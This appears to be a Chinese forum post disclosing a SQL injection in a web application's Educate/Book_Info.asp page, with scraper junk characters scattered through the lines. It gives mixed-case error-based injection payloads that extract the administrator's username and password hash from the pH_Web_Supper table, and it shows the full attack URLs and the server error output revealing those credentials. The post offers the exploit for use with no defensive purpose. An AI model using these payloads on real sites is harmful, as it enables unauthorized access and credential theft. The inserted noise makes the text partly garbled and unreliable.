漏洞出现在Educate/Book_Info.asp P+ J$ `, Z+ z+ w4 s b6 p! y. j- x: F1 b
0 _+ J/ H( |; j9 s
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出# I8 l) Q/ Z$ j" k( |
- D7 y# w, _+ oexp:如下# E) P: D8 @ v% P! r5 C. a
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)/ x# @% t7 L# s, E7 h( {7 z
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper): `" B0 U, q- J8 b7 x
# Y+ g0 S5 v5 v5 G& L/ Shttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper), V9 {9 a, c% L( v; a9 B+ |
6 ~1 j) `( R2 n vMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'4 `0 y( U3 o1 T1 Q6 y6 ]1 z- e
1 R4 q9 p9 c+ ^2 p; W
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
3 S+ z9 Y* L: J; ~# @% f; C 2 N( Y8 w, K2 ~; |$ ]) \
/Educate/Book_Info.asp,行 8
0 r6 o0 ^+ m8 U a 6 \1 w6 {: q% b J5 I
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
% G6 j( W# s) Q
+ M8 j, x; \( `$ r e7 w6 G5 x2 H/ s2 DMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'* y. c5 W% U( Q& z6 C$ Y
$ ?, O0 H0 {1 {. H9 ?
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
8 S# A# y& W- ~& A) V6 ] ! C; t% {5 O4 _
/Educate/Book_Info.asp,行 8; V, e. e- z! {( B. M' k2 C% O( c
|